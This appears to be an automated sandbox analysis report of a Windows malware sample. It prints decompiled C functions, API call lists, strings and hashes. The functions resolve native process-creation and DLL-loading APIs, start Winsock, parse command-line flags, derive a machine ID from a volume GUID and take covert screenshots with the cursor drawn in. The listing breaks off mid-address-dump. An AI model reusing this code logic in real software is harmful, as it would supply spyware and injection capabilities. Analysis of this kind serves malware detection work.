				_t91 = E0040E636();
				 *0x422bb0 = _t91;
				if(_t91 == _t83) {
					L27:
					_t40 = 0;
				} else {
					if(_t95 != _t83) {
						_v832 = E0040E570(_t87, _t89, _t91, "GetProcAddress");
						_v832 = E0040E570(_t87, _t89, _t91, "LoadLibraryA");
						_t43 =  *0x422bac; // 0x400000
						_t5 = _t43 + 0x3c; // 0xd8
						_v844 = _t43;
						_t87 =  *_t5 + _t43 + 0x80;
						__eflags = _v832 - _t83;
						if(_v832 == _t83) {
							goto L21;
						} else {
							__eflags = _v828 - _t83;
							if(_v828 == _t83) {
								goto L21;
							} else {
								_t91 =  *_t87;
								__eflags = _t91 - _t83;
								if(_t91 <= _t83) {
									goto L21;
								} else {
									__eflags = _t87[1] - 0x14;
									if(_t87[1] <= 0x14) {
										goto L21;
									} else {
										_t91 = _t91 + _t43;
										__eflags =  *_t91 - _t83;
										if( *_t91 == _t83) {
											goto L21;
										} else {
											while(1) {
												_t77 = _v824(_t91[3] + _v836);
												_v824 = _t77;
												__eflags = _t77 - _t83;
												if(_t77 == _t83) {
													goto L27;
												}
												_t100 = _v840 +  *_t91;
												_t86 = _v840 + _t91[4];
												while(1) {
													_t78 =  *_t100;
													__eflags = _t78;
													if(__eflags == 0) {
														break;
													}
													if(__eflags >= 0) {
														_t87 = _v840;
														_t79 =  &(_v840[0]) + _t78;
													} else {
														_t79 = _t78 & 0x0000ffff;
													}
													_t80 = _v832(_v824, _t79);
													__eflags = _t80;
													if(_t80 == 0) {
														goto L27;
													} else {
														 *_t86 = _t80;
														_t100 =  &(_t100[1]);
														_t86 = _t86 + 4;
														__eflags = _t86;
														continue;
													}
													goto L47;
												}
												_t91 =  &(_t91[5]);
												_t83 = 0;
												__eflags =  *_t91;
												if( *_t91 != 0) {
													continue;
												} else {
													goto L21;
												}
												goto L47;
											}
											goto L27;
										}
									}
								}
							}
						}
					} else {
						_t81 = GetModuleHandleW(_t83);
						 *0x422bac = _t81;
						if(_t81 == _t83) {
							goto L27;
						} else {
							L21:
							_t97 =  &_v816;
							E0040FA33(0xe5, _t97);
							_t47 = GetModuleHandleW(_t97);
							 *0x422bb4 = _t47;
							if(_t47 == _t83) {
								goto L27;
							} else {
								_t98 = GetProcAddress;
								 *0x422bb8 = GetProcAddress(_t47, "NtCreateThread");
								 *0x422bbc = GetProcAddress( *0x422bb4, "NtCreateUserProcess");
								 *0x422bc0 = GetProcAddress( *0x422bb4, "NtQueryInformationProcess");
								 *0x422bc4 = GetProcAddress( *0x422bb4, "RtlUserThreadStart");
								 *0x422bc8 = GetProcAddress( *0x422bb4, "LdrLoadDll");
								_t53 = GetProcAddress( *0x422bb4, "LdrGetDllHandle");
								 *0x422bcc = _t53;
								_t109 =  *0x422bb8 - _t83; // 0x77e599e0
								if(_t109 != 0) {
									L24:
									_t111 =  *0x422bc0 - _t83; // 0x77e59670
									if(_t111 == 0) {
										goto L27;
									} else {
										_t112 =  *0x422bc8 - _t83; // 0x77e27840
										if(_t112 == 0 || _t53 == _t83) {
											goto L27;
										} else {
											_t54 = HeapCreate(_t83, 0x80000, _t83); // executed
											 *0x424010 = _t54;
											__eflags = _t54 - _t83;
											if(_t54 != _t83) {
												 *0x422833 = 1;
											} else {
												 *0x424010 = GetProcessHeap();
												 *0x422833 = 0;
											}
											 *0x423244 = _t83;
											 *0x422832 = 0;
											InitializeCriticalSection(0x4231ac);
											 *0x423144 = _t83; // executed
											__imp__#115(0x202,  &_v796); // executed
											_t57 = E0040E670(_a4, _t87, _t91, _t98);
											__eflags = _t57;
											if(_t57 == 0) {
												goto L27;
											} else {
												__eflags = _v840 - _t83;
												if(_v840 != _t83) {
													L34:
													_t58 = E004179BF(_t87, 0xffffffff, 0x422ba8);
													 *0x422b9c = _t58;
													__eflags = _t58 - _t83;
													if(_t58 == _t83) {
														goto L27;
													} else {
														 *0x422ba0 = GetLengthSid( *_t58);
														_t60 =  *0x422b9c; // 0x0
														 *0x422ba4 = E00417757( *_t60, _t59);
														_t62 = E0040E6EF(_t61, _a4);
														__eflags = _t62;
														if(_t62 == 0) {
															goto L27;
														} else {
															 *0x422e08 = GetCurrentProcessId();
															 *0x422e0c = _t83;
															__eflags = _v840 - _t83;
															if(_v840 != _t83) {
																_t64 = 1;
															} else {
																_t64 = E0040E751();
															}
															__eflags = _t64;
															if(_t64 == 0) {
																goto L27;
															} else {
																__eflags = _v840 - _t83;
																if(_v840 == _t83) {
																	E0040F05A( &_v804);
																	_t87 = 0x423006;
																	E0041AA01(0x423006, 0x422e10,  *0x422ba4,  &_v435, _t83);
																}
																_t65 = E0040E7A3(_a4);
																__eflags = _t65;
																if(_t65 == 0) {
																	goto L27;
																} else {
																	__eflags = _a4 & 0x00000002;
																	 *0x424020 = _t83;
																	 *0x4223a8 = 0;
																	 *0x4231d8 = 0;
																	 *0x422838 = 0;
																	 *0x4227d0 = 0;
																	 *0x423148 = 0;
																	 *0x4230c0 = 0;
																	if(__eflags == 0) {
																		_t67 = 1;
																	} else {
																		_t67 = E0040E85A(_t87, _t89, __eflags);
																	}
																	__eflags = _t67;
																	_t38 = _t67 != 0;
																	__eflags = _t38;
																	_t40 = _t67 & 0xffffff00 | _t38;
																}
															}
														}
													}
												} else {
													_t73 = CreateEventW(0x422bd0, 1, _t83, _t83);
													 *0x423060 =  *0x423060 | 0xffffffff;
													 *0x42305c = _t73;
													__eflags = _t73 - _t83;
													if(_t73 == _t83) {
														goto L27;
													} else {
														goto L34;
													}
												}
											}
										}
									}
								} else {
									_t110 =  *0x422bbc - _t83; // 0x77e5a120
									if(_t110 == 0) {
										goto L27;
									} else {
										goto L24;
									}
								}
							}
						}
					}
				}
				L47:
				return _t40;
			}

0x0040e97b
0x0040e97b
0x0040e98c
0x0040e990
0x0040e994
0x0040e9a0
0x0040e9a0
0x0040e996
0x0040e996
0x0040e998
0x0040e998
0x0040e9a7
0x0040e9a9
0x0040e9b1
0x0040eb36
0x0040eb36
0x0040e9b7
0x0040e9b9
0x0040e9e3
0x0040e9ec
0x0040e9f0
0x0040e9f5
0x0040e9f8
0x0040e9fc
0x0040ea03
0x0040ea07
0x00000000
0x0040ea09
0x0040ea09
0x0040ea0d
0x00000000
0x0040ea0f
0x0040ea0f
0x0040ea11
0x0040ea13
0x00000000
0x0040ea15
0x0040ea15
0x0040ea19
0x00000000
0x0040ea1b
0x0040ea1b
0x0040ea1d
0x0040ea1f
0x00000000
0x0040ea21
0x0040ea21
0x0040ea29
0x0040ea2d
0x0040ea31
0x0040ea33
0x00000000
0x00000000
0x0040ea3e
0x0040ea42
0x0040ea72
0x0040ea72
0x0040ea74
0x0040ea76
0x00000000
0x00000000
0x0040ea48
0x0040ea51
0x0040ea55
0x0040ea4a
0x0040ea4a
0x0040ea4a
0x0040ea5e
0x0040ea62
0x0040ea64
0x00000000
0x0040ea6a
0x0040ea6a
0x0040ea6c
0x0040ea6f
0x0040ea6f
0x00000000
0x0040ea6f
0x00000000
0x0040ea64
0x0040ea78
0x0040ea7b
0x0040ea7d
0x0040ea7f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ea7f
0x00000000
0x0040ea21
0x0040ea1f
0x0040ea19
0x0040ea13
0x0040ea0d
0x0040e9bb
0x0040e9bc
0x0040e9c2
0x0040e9c9
0x00000000
0x0040e9cf
0x0040ea81
0x0040ea81
0x0040ea8a
0x0040ea92
0x0040ea98
0x0040ea9f
0x00000000
0x0040eaa5
0x0040eaa5
0x0040eabe
0x0040ead0
0x0040eae2
0x0040eaf4
0x0040eb06
0x0040eb0b
0x0040eb0d
0x0040eb12
0x0040eb18
0x0040eb22
0x0040eb22
0x0040eb28
0x00000000
0x0040eb2a
0x0040eb2a
0x0040eb30
0x00000000
0x0040eb3d
0x0040eb44
0x0040eb4a
0x0040eb4f
0x0040eb51
0x0040eb67
0x0040eb53
0x0040eb59
0x0040eb5e
0x0040eb5e
0x0040eb73
0x0040eb79
0x0040eb80
0x0040eb90
0x0040eb96
0x0040eb9f
0x0040eba4
0x0040eba6
0x00000000
0x0040eba8
0x0040eba8
0x0040ebac
0x0040ebd1
0x0040ebd8
0x0040ebdd
0x0040ebe2
0x0040ebe4
0x00000000
0x0040ebea
0x0040ebf2
0x0040ebf8
0x0040ec07
0x0040ec0c
0x0040ec11
0x0040ec13
0x00000000
0x0040ec19
0x0040ec1f
0x0040ec24
0x0040ec2a
0x0040ec2e
0x0040ec37
0x0040ec30
0x0040ec30
0x0040ec30
0x0040ec39
0x0040ec3b
0x00000000
0x0040ec41
0x0040ec41
0x0040ec45
0x0040ec4b
0x0040ec5f
0x0040ec6e
0x0040ec6e
0x0040ec76
0x0040ec7b
0x0040ec7d
0x00000000
0x0040ec83
0x0040ec85
0x0040ec89
0x0040ec8f
0x0040ec95
0x0040ec9b
0x0040eca1
0x0040eca7
0x0040ecad
0x0040ecb3
0x0040ecbc
0x0040ecb5
0x0040ecb5
0x0040ecb5
0x0040ecbe
0x0040ecc0
0x0040ecc0
0x0040ecc0
0x0040ecc0
0x0040ec7d
0x0040ec3b
0x0040ec13
0x0040ebae
0x0040ebb7
0x0040ebbd
0x0040ebc4
0x0040ebc9
0x0040ebcb
0x00000000
0x00000000
0x00000000
0x00000000
0x0040ebcb
0x0040ebac
0x0040eba6
0x0040eb30
0x0040eb1a
0x0040eb1a
0x0040eb20
0x00000000
0x00000000
0x00000000
0x00000000
0x0040eb20
0x0040eb18
0x0040ea9f
0x0040e9c9
0x0040e9b9
0x0040ecc3
0x0040ecc9

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 0040E9BC
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 0040EA92
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0040EAB1
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0040EAC3
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0040EAD5
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040EAE7
GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040EAF9
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040EB0B
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 0040EB44
GetProcessHeap.KERNEL32(?,?,00000000), ref: 0040EB53
InitializeCriticalSection.KERNEL32(004231AC,?,?,00000000), ref: 0040EB80
WSAStartup.WS2_32(00000202,?), ref: 0040EB96
CreateEventW.KERNEL32(00422BD0,00000001,00000000,00000000,?,?,00000000), ref: 0040EBB7
GetLengthSid.ADVAPI32(00000000,000000FF,00422BA8,?,?,00000000), ref: 0040EBEC
GetCurrentProcessId.KERNEL32(00000000,00000000,00000000,?,?,00000000), ref: 0040EC19

Strings

@xw, xrefs: 0040EB06, 0040EB2A
RtlUserThreadStart, xrefs: 0040EAD7
NtCreateThread, xrefs: 0040EAAB
LdrLoadDll, xrefs: 0040EAE9
LoadLibraryA, xrefs: 0040E9DE
GetProcAddress, xrefs: 0040E9D4
NtCreateUserProcess, xrefs: 0040EAB3
NtQueryInformationProcess, xrefs: 0040EAC5
LdrGetDllHandle, xrefs: 0040EAFB

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
String ID: @xw$GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 3091071419-944592941
Opcode ID: fa8a8f21df3ef0477e084f520fdd5187f1b350d3fb1b71ab9a0f1fb12392cebd
Instruction ID: 6ebb372c4d2dc279074349e0270c5f727c352a9d832e6b3227ae34f1e97ef748
Opcode Fuzzy Hash: fa8a8f21df3ef0477e084f520fdd5187f1b350d3fb1b71ab9a0f1fb12392cebd
Instruction Fuzzy Hash: 78919E71A04301EFCB30EF62EE85A163BB4BB14305B90097FE941B32A0D778A956CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F902, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(signed int __ecx, void* __edx, void* __eflags, void* __fp0) {
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t28;
				char _t29;
				char _t33;
				signed int _t36;
				void* _t51;

				_t51 = __fp0;
				_t34 = __ecx;
				_t33 = 0; // executed
				_t22 = E0040E97B(__ecx, __edx, 0); // executed
				if(_t22 == 0) {
					L24:
					__eflags = _t33;
					_t21 = _t33 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v20 = 0;
				_v16 = 1;
				_v5 = 0;
				SetErrorMode(0x8007);
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t28 == 0) {
					L19:
					_t29 = E0040F5BB(_t34, __eflags, _t51, _v20, _v16);
					L20:
					_t33 = _t29;
					L21:
					if(_t33 == 0 || ( *0x422b98 & 0x00000002) == 0) {
						goto L24;
					} else {
						Sleep(0xffffffff);
						return _t29;
					}
				}
				_t36 = 0;
				if(_v12 <= 0) {
					L14:
					LocalFree(_t28);
					_t48 = _t33;
					if(_t33 == 0) {
						__eflags = _v5;
						if(__eflags == 0) {
							goto L19;
						}
						E004080CB(_t36);
						_t29 = E0041D2BC();
						__eflags =  *0x422b98 & 0x00000004;
						_t33 = _t29;
						if(( *0x422b98 & 0x00000004) != 0) {
							_t29 = E00407F44(0x4228e0, 0);
						}
						goto L21;
					}
					_t29 = E0040F3C2(_t48);
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					_t34 =  *(_t28 + _t36 * 4);
					if(_t34 != 0 &&  *_t34 == 0x2d) {
						_t34 =  *(_t34 + 2) & 0x0000ffff;
						if(_t34 == 0x66) {
							_v20 = 1;
						} else {
							if(_t34 == 0x69) {
								_t33 = 1;
							} else {
								if(_t34 == 0x6e) {
									_v16 = 0;
								} else {
									if(_t34 == 0x76) {
										_v5 = 1;
									}
								}
							}
						}
					}
					_t36 = _t36 + 1;
				} while (_t36 < _v12);
				goto L14;
			}

0x0040f902
0x0040f902
0x0040f90b
0x0040f90d
0x0040f914
0x0040f9ee
0x0040f9f0
0x0040f9f2
0x0040f9f2
0x0040f9f6
0x0040f9f6
0x0040f91f
0x0040f922
0x0040f926
0x0040f929
0x0040f93a
0x0040f942
0x0040f9c9
0x0040f9cf
0x0040f9d4
0x0040f9d4
0x0040f9d6
0x0040f9d8
0x00000000
0x0040f9e3
0x0040f9e5
0x0040f9ed
0x0040f9ed
0x0040f9d8
0x0040f948
0x0040f94d
0x0040f98e
0x0040f98f
0x0040f995
0x0040f997
0x0040f9a0
0x0040f9a4
0x00000000
0x00000000
0x0040f9a6
0x0040f9ab
0x0040f9b0
0x0040f9b7
0x0040f9b9
0x0040f9c2
0x0040f9c2
0x00000000
0x0040f9b9
0x0040f999
0x00000000
0x00000000
0x00000000
0x00000000
0x0040f94f
0x0040f94f
0x0040f94f
0x0040f954
0x0040f95c
0x0040f963
0x0040f984
0x0040f965
0x0040f968
0x0040f980
0x0040f96a
0x0040f96d
0x0040f97a
0x0040f96f
0x0040f972
0x0040f974
0x0040f974
0x0040f972
0x0040f96d
0x0040f968
0x0040f963
0x0040f988
0x0040f989
0x00000000

APIs

Part of subcall function 0040E97B: GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 0040E9BC
Part of subcall function 0040E97B: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 0040EA92
Part of subcall function 0040E97B: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0040EAB1
Part of subcall function 0040E97B: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0040EAC3
Part of subcall function 0040E97B: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0040EAD5
Part of subcall function 0040E97B: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0040EAE7
Part of subcall function 0040E97B: GetProcAddress.KERNEL32(LdrLoadDll), ref: 0040EAF9
Part of subcall function 0040E97B: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0040EB0B

SetErrorMode.KERNEL32(00008007,00000000), ref: 0040F929
GetCommandLineW.KERNEL32(?), ref: 0040F933
CommandLineToArgvW.SHELL32(00000000), ref: 0040F93A
LocalFree.KERNEL32(00000000), ref: 0040F98F
Sleep.KERNEL32(000000FF,?,00000001), ref: 0040F9E5
ExitProcess.KERNEL32 ref: 0040F9F6

Strings

(B, xrefs: 0040F9BD

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$CommandHandleLineModule$ArgvErrorExitFreeLocalModeProcessSleep
String ID: (B
API String ID: 1184560534-566106762
Opcode ID: 4498de991e688f18d371340eadb7455b07049ab894b6283f2ec3557d0de6ed0c
Instruction ID: 06ec7da1c708e89769c56df364006b45230c9372001e74c49d0c52b8d8a915d9
Opcode Fuzzy Hash: 4498de991e688f18d371340eadb7455b07049ab894b6283f2ec3557d0de6ed0c
Instruction Fuzzy Hash: 36210AB0944245B5CF346BB489097AE7B505F02308F9840BFE44177AE2C67E484E8B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0041A94B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0041A94B() {
				void* _t30;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t39 = _t41 - 0x74;
				_t17 = _t39 - 0x260;
				 *((char*)(_t39 + 0x73)) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
				if(_t17 != 0) {
					L8:
					E0041645B(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
				} else {
					PathAddBackslashW(_t39 - 0x260);
					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW(_t39 - 0x260);
						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t39 - 0x260);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t39 - 0x44)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t39 + 8)) = 0;
						_t17 = _t39 - 0x44;
						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
						if(_t17 != 0) {
							goto L8;
						} else {
							 *((char*)(_t39 + 0x73)) = 1;
						}
					}
				}
				L9:
				return  *((intOrPtr*)(_t39 + 0x73));
			}

0x0041a94c
0x0041a95b
0x0041a967
0x0041a96a
0x0041a972
0x0041a9e9
0x0041a9ef
0x0041a974
0x0041a981
0x0041a983
0x0041a9b2
0x0041a9bf
0x0041a9c3
0x00000000
0x00000000
0x0041a992
0x0041a9a7
0x00000000
0x0041a9a9
0x0041a9b0
0x00000000
0x0041a9b0
0x00000000
0x0041a9a7
0x0041a9ca
0x00000000
0x0041a9cc
0x0041a9d1
0x0041a9d5
0x0041a9d9
0x0041a9e1
0x00000000
0x0041a9e3
0x0041a9e3
0x0041a9e3
0x0041a9e1
0x0041a9ca
0x0041a9f4
0x0041a9fe

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,74B04EE0,00000000), ref: 0041A96A
PathAddBackslashW.SHLWAPI(?), ref: 0041A981
PathRemoveBackslashW.SHLWAPI(?), ref: 0041A992
PathRemoveFileSpecW.SHLWAPI(?), ref: 0041A99F
PathAddBackslashW.SHLWAPI(?), ref: 0041A9B0
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 0041A9BF
CLSIDFromString.OLE32(?,?), ref: 0041A9D9

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: 18936fbe24d20d9608907f8ee321ecefaf400316c4cf2982d45756bdf1441dd5
Instruction ID: 1ed91e3b3591ed1363ec3d304cd3f7ed46133817e8c88f08c28723f1286077f9
Opcode Fuzzy Hash: 18936fbe24d20d9608907f8ee321ecefaf400316c4cf2982d45756bdf1441dd5
Instruction Fuzzy Hash: 7D1172B150410CAADB209BB1DC88EEF7BACAB04344F140466F615E3121E639DE999B65

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00411779, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E00411779(WCHAR* _a4, char _a8, signed short _a12) {
				struct HINSTANCE__* _v12;
				struct HINSTANCE__* _v16;
				struct HINSTANCE__* _v20;
				_Unknown_base(*)()* _v24;
				void* _v28;
				void* _v32;
				struct HDC__* _v36;
				_Unknown_base(*)()* _v40;
				_Unknown_base(*)()* _v44;
				struct tagPOINT _v52;
				_Unknown_base(*)()* _v56;
				struct HINSTANCE__* _v60;
				_Unknown_base(*)()* _v64;
				_Unknown_base(*)()* _v68;
				_Unknown_base(*)()* _v72;
				_Unknown_base(*)()* _v76;
				_Unknown_base(*)()* _v80;
				_Unknown_base(*)()* _v84;
				_Unknown_base(*)()* _v88;
				struct HINSTANCE__* _v92;
				struct HINSTANCE__* _v96;
				struct HINSTANCE__* _v100;
				char _v104;
				_Unknown_base(*)()* _v108;
				intOrPtr _v112;
				char _v116;
				_Unknown_base(*)()* _v120;
				char _v148;
				signed int _v152;
				struct _ICONINFO _v172;
				char _v188;
				struct HINSTANCE__* _t169;
				_Unknown_base(*)()* _t176;
				struct HINSTANCE__* _t181;
				_Unknown_base(*)()* _t182;
				struct HINSTANCE__* _t183;
				_Unknown_base(*)()* _t191;
				struct HDC__* _t197;
				struct HICON__* _t199;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t204;
				void* _t206;
				void* _t223;
				intOrPtr* _t224;
				void* _t239;
				void* _t248;
				unsigned int _t260;
				intOrPtr* _t262;
				signed short _t263;
				intOrPtr _t264;
				WCHAR** _t265;
				intOrPtr _t268;
				signed int _t269;
				signed int _t272;
				void* _t275;

				_v32 = 0;
				_v60 = 0;
				_v16 = 0;
				_v104 = 1;
				_v100 = 0;
				_v96 = 0;
				_v92 = 0;
				_t169 = LoadLibraryA("gdiplus.dll");
				_v20 = _t169;
				_v24 = GetProcAddress(_t169, "GdiplusStartup");
				_v80 = GetProcAddress(_v20, "GdiplusShutdown");
				_v88 = GetProcAddress(_v20, "GdipCreateBitmapFromHBITMAP");
				_v72 = GetProcAddress(_v20, "GdipDisposeImage");
				_v40 = GetProcAddress(_v20, "GdipGetImageEncodersSize");
				_v64 = GetProcAddress(_v20, "GdipGetImageEncoders");
				_t176 = GetProcAddress(_v20, "GdipSaveImageToStream");
				_v108 = _t176;
				if(_v24 == 0 || _v80 == 0 || _v88 == 0 || _v72 == 0 || _v40 == 0 || _v64 == 0 || _t176 == 0) {
					L66:
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
					if(_v60 != 0) {
						FreeLibrary(_v60);
					}
					if(_v16 != 0) {
						FreeLibrary(_v16);
					}
					return _v32;
				} else {
					_t181 = LoadLibraryA("ole32.dll");
					_v60 = _t181;
					_t182 = GetProcAddress(_t181, "CreateStreamOnHGlobal");
					_v120 = _t182;
					if(_t182 == 0) {
						goto L66;
					}
					_t183 = LoadLibraryA("gdi32.dll");
					_v16 = _t183;
					_t262 = GetProcAddress(_t183, "CreateDCW");
					_v12 = GetProcAddress(_v16, "CreateCompatibleDC");
					_v44 = GetProcAddress(_v16, "CreateCompatibleBitmap");
					_v28 = GetProcAddress(_v16, "GetDeviceCaps");
					_v56 = GetProcAddress(_v16, "SelectObject");
					_v76 = GetProcAddress(_v16, "BitBlt");
					_v84 = GetProcAddress(_v16, "DeleteObject");
					_t191 = GetProcAddress(_v16, "DeleteDC");
					_v68 = _t191;
					if(_t262 == 0 || _v12 == 0 || _v44 == 0 || _v28 == 0 || _v56 == 0 || _v76 == 0 || _v84 == 0 || _t191 == 0) {
						goto L66;
					} else {
						_push(0);
						_push( &_v104);
						_push( &_v116);
						_v104 = 1;
						_v100 = 0;
						_v96 = 0;
						_v92 = 0;
						if(_v24() != 0) {
							goto L66;
						}
						_t268 =  *_t262(L"DISPLAY", 0, 0, 0);
						_v24 = _t268;
						if(_t268 == 0) {
							L65:
							_v80(_v116);
							goto L66;
						}
						_t197 = _v12(_t268);
						_v36 = _t197;
						if(_t197 == 0) {
							L64:
							_v68(_v24);
							goto L65;
						}
						_t199 = LoadImageW(0, 0x7f00, 2, 0, 0, 0x8040);
						_v12 = _t199;
						if(_t199 == 0) {
							L24:
							_t263 = 0;
							goto L26;
						} else {
							if(GetIconInfo(_t199,  &_v172) == 0 || GetCursorPos( &_v52) == 0) {
								_v12 = 0;
							}
							if(_v12 != 0) {
								_t263 = _a12;
								L26:
								if(_t263 == 0) {
									_t200 = _v28(_t268, 8);
									_t269 = _t200;
									_a12 = _v28(_v24, 0xa);
								} else {
									_t269 = _t263 & 0x0000ffff;
									_a12 = _t269;
								}
								_t202 = _v44(_v24, _t269, _a12);
								_v44 = _t202;
								if(_t202 == 0) {
									L63:
									_v68(_v36);
									goto L64;
								} else {
									_t204 = _v56(_v36, _t202);
									_v112 = _t204;
									if(_t204 == 0) {
										L62:
										_v84(_v44);
										goto L63;
									}
									_t206 = 0;
									_t248 = 0;
									if(_t263 != 0) {
										_t260 = (_t263 & 0x0000ffff) >> 1;
										_t206 =  <  ? 0 : _v52.x - _t260;
										_t248 =  <  ? 0 : _v52.y - _t260;
										_t81 =  &_v52;
										 *_t81 = _v52.x - _t206;
										if( *_t81 < 0) {
											_v52.x = 0;
										}
										_t84 =  &(_v52.y);
										 *_t84 = _v52.y - _t248;
										if( *_t84 < 0) {
											_v52.y = 0;
										}
									}
									_push(0x40cc0020);
									_push(_t248);
									_push(_t206);
									_push(_v24);
									_push(_a12);
									_push(_t269);
									_push(0);
									_push(0);
									_push(_v36);
									if(_v76() == 0) {
										L61:
										_v56(_v36, _v112);
										goto L62;
									} else {
										if(_v12 != 0) {
											_t254 =  <  ? 0 : _v52.x - _v172.xHotspot;
											_t239 = _v52.y - _v172.yHotspot;
											_t240 =  <  ? 0 : _t239;
											DrawIcon(_v36,  <  ? 0 : _v52.x - _v172.xHotspot,  <  ? 0 : _t239, _v12);
										}
										_push( &_v12);
										_push(0);
										_push(_v44);
										_v12 = 0;
										if(_v88() != 0 || _v12 == 0) {
											goto L61;
										} else {
											_push( &_v28);
											_push( &_a12);
											_a12 = 0;
											_v28 = 0;
											if(_v40() != 0) {
												L60:
												_v72(_v12);
												goto L61;
											}
											_t215 = _v28;
											if(_v28 == 0 || _a12 == 0) {
												goto L60;
											} else {
												_t264 = E00416378(_t215);
												_v40 = _t264;
												if(_t264 == 0) {
													goto L60;
												}
												_push(_t264);
												_push(_v28);
												_push(_a12);
												if(_v64() != 0) {
													L52:
													E004163A8(_v40);
													if(_a12 == 0) {
														_push( &_v32);
														_push(1);
														_push(0);
														if(_v120() == 0 && _v32 != 0) {
															_v152 = 0;
															if(_a8 > 0) {
																E004163E4( &_v148, 0x4044a4, 0x10);
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x7c)) = 4;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x80)) = 1;
																 *((intOrPtr*)(_t275 + _v152 * 0x1c - 0x78)) =  &_a8;
																_v152 = _v152 + 1;
															}
															_t223 = _v108(_v12, _v32,  &_v188,  &_v152);
															_t224 = _v32;
															if(_t223 == 0) {
																 *((intOrPtr*)( *_t224 + 0x14))(_t224, 0, 0, 0, 0);
															} else {
																 *((intOrPtr*)( *_t224 + 8))(_t224);
																_v32 = 0;
															}
														}
													}
													goto L60;
												}
												_t272 = 0;
												if(_a12 <= 0) {
													goto L52;
												}
												_t265 = _t264 + 0x30;
												while(lstrcmpiW(_a4,  *_t265) != 0) {
													_t272 = _t272 + 1;
													_t265 =  &(_t265[0x13]);
													if(_t272 < _a12) {
														continue;
													}
													goto L52;
												}
												E004163E4( &_v188, _t272 * 0x4c + _v40, 0x10);
												_a12 = 0;
												goto L52;
											}
										}
									}
								}
							}
							goto L24;
						}
					}
				}
			}

0x00411792
0x00411795
0x00411798
0x0041179b
0x004117a2
0x004117a5
0x004117a8
0x004117ab
0x004117b9
0x004117c6
0x004117d3
0x004117e0
0x004117ed
0x004117fa
0x00411807
0x0041180a
0x0041180c
0x00411812
0x00411bf6
0x00411bff
0x00411c04
0x00411c04
0x00411c09
0x00411c0e
0x00411c0e
0x00411c13
0x00411c18
0x00411c18
0x00411c21
0x0041184d
0x00411852
0x0041185a
0x0041185d
0x0041185f
